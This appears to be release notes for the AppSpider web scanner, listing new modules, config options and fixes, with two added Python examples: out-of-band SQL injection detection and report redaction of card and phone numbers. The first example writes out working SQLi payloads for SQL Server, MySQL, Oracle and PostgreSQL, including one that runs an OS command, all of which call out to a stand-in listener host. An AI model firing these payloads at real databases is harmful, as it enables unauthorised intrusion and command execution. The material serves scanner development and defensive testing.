New
- Out-of-Band SQL Injection module. We added a new Out-of-Band SQL Injection module that checks the application for SQLi vulnerabilities that can be detected by monitoring external DNS and HTTP network interactions.
- Config options. We added three new configuration options:
  - LimitToOneBrowser, to limit the engine to a single browser instance during scans.
  - DenylistAllForms, to prevent the engine from populating or attacking any type of form on a site.
  - Max404FindingsPerModule, to let customers limit the number of vulnerabilities reported against 404 pages.
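The out-of-band module above relies on one mechanism: every injection point gets its own canary host under a domain the scanner controls, and any DNS query or HTTP request that reaches that domain carrying the canary proves the injected SQL executed, even when the HTTP response shows nothing. The script below is an added example of that correlation step and is not AppSpider's code; the listener domain (oob.example.net), the back-end payloads, the injection points and the log lines are all assumptions constructed for the example.

```python
"""Out-of-band SQL injection detection: per-injection-point canaries and
callback correlation.

Added example, not AppSpider's code. Each injection point is assigned a
unique canary label under a listener domain the scanner controls (assumed
here to be oob.example.net). The payloads try to make the database server
resolve or fetch that canary host, so a DNS query or HTTP request arriving
at the listener with the label proves the injected SQL ran on the back end.
Log formats and injection points below are constructed for the example.
"""
import re
import secrets
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List

LISTENER_DOMAIN = "oob.example.net"  # assumption: scanner-owned, logs every query

# A canary is 8 hex chars. DNS is case-insensitive (and resolvers may apply
# 0x20 case randomisation), so matching ignores case and labels are normalised.
CANARY_RE = re.compile(r"\b([0-9a-f]{8})\." + re.escape(LISTENER_DOMAIN), re.IGNORECASE)


@dataclass(frozen=True)
class InjectionPoint:
    url: str
    parameter: str


def make_canary() -> str:
    """32 random bits: enough to tie one callback to exactly one injection point."""
    return secrets.token_hex(4)


def build_payloads(canary: str) -> Dict[str, str]:
    """Back-end specific payloads that force a lookup of the canary host.

    Each payload only fires on the named engine; a scanner sends all of them
    at every point because it usually does not know the back end in advance.
    """
    host = f"{canary}.{LISTENER_DOMAIN}"
    return {
        # SQL Server: xp_dirtree lists a UNC path, which triggers a DNS lookup
        "mssql": f"';EXEC master..xp_dirtree '\\\\{host}\\x';--",
        # MySQL on Windows: LOAD_FILE on a UNC path does the same
        "mysql": f"' AND LOAD_FILE('\\\\\\\\{host}\\\\x')--",
        # Oracle: resolve the name directly
        "oracle": f"' AND UTL_INADDR.GET_HOST_ADDRESS('{host}') IS NOT NULL--",
        # PostgreSQL (superuser only): shell out to the resolver
        "postgres": f"';COPY (SELECT '') TO PROGRAM 'nslookup {host}';--",
    }


def register(points: Iterable[InjectionPoint],
             canary_factory: Callable[[], str] = make_canary) -> Dict[str, InjectionPoint]:
    """Assign a fresh canary to every injection point. The scanner keeps this
    map for the whole scan because callbacks can arrive minutes later."""
    return {canary_factory().lower(): p for p in points}


def correlate(log_lines: Iterable[str],
              registry: Dict[str, InjectionPoint]) -> Dict[InjectionPoint, List[str]]:
    """Map listener log lines (DNS or HTTP) back to the injection points whose
    canaries they carry. Labels not in the registry are noise (internet
    scanners, typos) and are ignored rather than reported as findings."""
    hits: Dict[InjectionPoint, List[str]] = {}
    for line in log_lines:
        m = CANARY_RE.search(line)
        if not m:
            continue
        point = registry.get(m.group(1).lower())
        if point is not None:
            hits.setdefault(point, []).append(line)
    return hits


if __name__ == "__main__":
    points = [InjectionPoint("https://shop.example/search", "q"),
              InjectionPoint("https://shop.example/item", "id")]
    registry = register(points)
    canary = next(iter(registry))  # pretend only the first point is vulnerable
    # Constructed listener output: a BIND-style query log line, an HTTP access
    # log line, and an unrelated query that must not produce a finding.
    log = [
        f"client 203.0.113.7#53421: query: {canary.upper()}.{LISTENER_DOMAIN} IN A +",
        f'203.0.113.7 - - "GET http://{canary}.{LISTENER_DOMAIN}/x HTTP/1.1" 200 2',
        f"client 203.0.113.9#40001: query: ffffffff.{LISTENER_DOMAIN} IN A +",
    ]
    for point, lines in correlate(log, registry).items():
        print(f"confirmed OOB SQLi at {point.url} parameter {point.parameter}: "
              f"{len(lines)} callbacks")
```

The registry is what makes the result attributable: a bare "we saw a lookup" is not a finding until the label maps back to a specific URL and parameter, and a label nobody registered is dropped instead of inflating the report.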
Improved
- Remote Code Execution module. We updated the Remote Code Execution module severity from medium to high.
- Selenium ChromeDriver. The installed version of Selenium ChromeDriver is now 100.0.4896.60.
- Reflected XSS attack module. We improved the Reflected Cross-site Scripting (XSS) simple attack module to catch a previously unreported vulnerability.
- AppSpider report. AppSpider reports now show redacted versions of any known credit card numbers, telephone numbers, and other sensitive information.
- Expression Language Injection attack. We added a new Expression Language Injection attack.
- X-Content-Type-Options attack. We updated the X-Content-Type-Options attack to only run against HTML, XML, and JSON types.
- Attack description. We updated the attack description for the Content Security Policy attack.
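The report redaction item above is the kind of change where false positives matter: a scanner report that blanks every long digit string also hides order numbers and timestamps the reader needs. The following is an added example, not AppSpider's redaction code, showing one way to mask card numbers only when they pass the Luhn check and to mask telephone numbers on a common North American/E.164-style shape; the regexes, the keep-last-four policy and the sample text are assumptions constructed for the example.

```python
"""Redacting card numbers and telephone numbers from report text.

Added example, not AppSpider's redaction code. Card candidates are 13 to 19
digits (optionally space/dash separated) and are masked only if they pass
the Luhn check, so order numbers and timestamps stay readable; telephone
numbers are matched on a common North American/E.164-style shape (an
assumption) and fully masked. Sample text is constructed.
"""
import re

PAN_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
PHONE_RE = re.compile(
    r"(?<!\d)(?:\+?\d{1,3}[ .-]?)?(?:\(\d{3}\)|\d{3})[ .-]?\d{3}[ .-]?\d{4}(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Mod-10 check that every issued card number satisfies."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                       # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def _mask_pan(m: "re.Match[str]") -> str:
    digits = re.sub(r"\D", "", m.group(0))
    if not 13 <= len(digits) <= 19 or not luhn_ok(digits):
        return m.group(0)                    # not a card number: leave it alone
    return "*" * (len(digits) - 4) + digits[-4:]   # keep last four for triage


def redact(text: str) -> str:
    """Mask card numbers first so their digits cannot be re-matched as phone numbers."""
    text = PAN_RE.sub(_mask_pan, text)
    return PHONE_RE.sub(lambda m: re.sub(r"\d", "*", m.group(0)), text)


if __name__ == "__main__":
    # Constructed report excerpt: one real (test) card number, one order id
    # that fails Luhn, and one phone number.
    sample = ("Card 4111 1111 1111 1111 exp 12/26, order 1234567890123456, "
              "call +1 415-555-0142")
    print(redact(sample))
```

Keeping the last four digits is a policy choice, not a requirement; if the report leaves the environment that collected it, masking all digits is the safer default.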
Fixed
- Proxy exceptions are now being honored.
- Macro recordings can now be saved from the Pro UI.
- The OpenAPI content type application/form is no longer incorrect.
- The engine now correctly parses Swagger documents and no longer inputs null values.